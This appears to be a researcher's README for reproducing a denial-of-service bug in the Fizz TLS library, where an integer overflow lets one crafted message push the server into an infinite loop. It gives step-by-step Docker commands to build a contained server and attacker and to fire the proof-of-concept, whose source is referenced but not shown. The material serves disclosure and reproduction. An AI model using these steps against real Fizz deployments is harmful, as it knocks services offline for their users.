Fizz contains a remotely triggerable infinite loop. It is due to an integer overflow in this compound assignment. For more details about the bug, see this blog post.
The scenario for the demo is that there are two computers, named "fizz-server" and "fizz-attacker". The attacker sends a malicious message which triggers an infinite loop on the server. The demo uses docker to simulate the two computers. See below for instructions.
Create a docker network bridge, to simulate a network with two separate computers.
docker network create -d bridge --subnet 172.18.0.0/16 fizz-demo-network
Build the docker image:
docker build server -t fizz-server --build-arg UID=`id -u`
Start the container:
docker run --rm --network fizz-demo-network --ip=172.18.0.10 -i -t fizz-server
If you want to be able to debug the fizz server, then you need to start the container with some extra command line arguments:
docker run --rm --network fizz-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -i -t fizz-server
Inside the container, run this script to create some certs:
cd ~/certs
./create-certs.sh
Start the server:
~/fizz/build_/bin/fizz server -accept 1443 -cert ~/certs/server-cert.pem -key ~/certs/server-key.pem
Note: TLS servers normally listen on port 443, rather than 1443. But root privileges are required to listen on 443, so you need to run the above command with sudo if you want to change the port number to 443. The sudo password in this docker container is "x".
Build the docker image:
docker build attacker -t fizz-attacker --build-arg UID=`id -u`
Start the container:
docker run --rm --network fizz-demo-network --ip=172.18.0.11 -i -t fizz-attacker
Send the malicious message to the server:
./poc/poc 172.18.0.10 1443
The source code for the PoC can be found in poc.c.
The original PoC, which I sent to Facebook when I first reported the vulnerability, is far less polished than poc.c, above. But it may be of interest because it shows how I tweaked the Fizz client to send the malicious message. The changes which I made can be found in diff.txt. (These changes were already applied during the docker build step, above.) You can run this version of the PoC like this:
~/fizz/build_/bin/fizz client -connect 172.18.0.10:1443
This command will not return because it is waiting for a response from the server, which will never come. But you can just ctrl-C it, and the server will continue to be stuck in an infinite loop.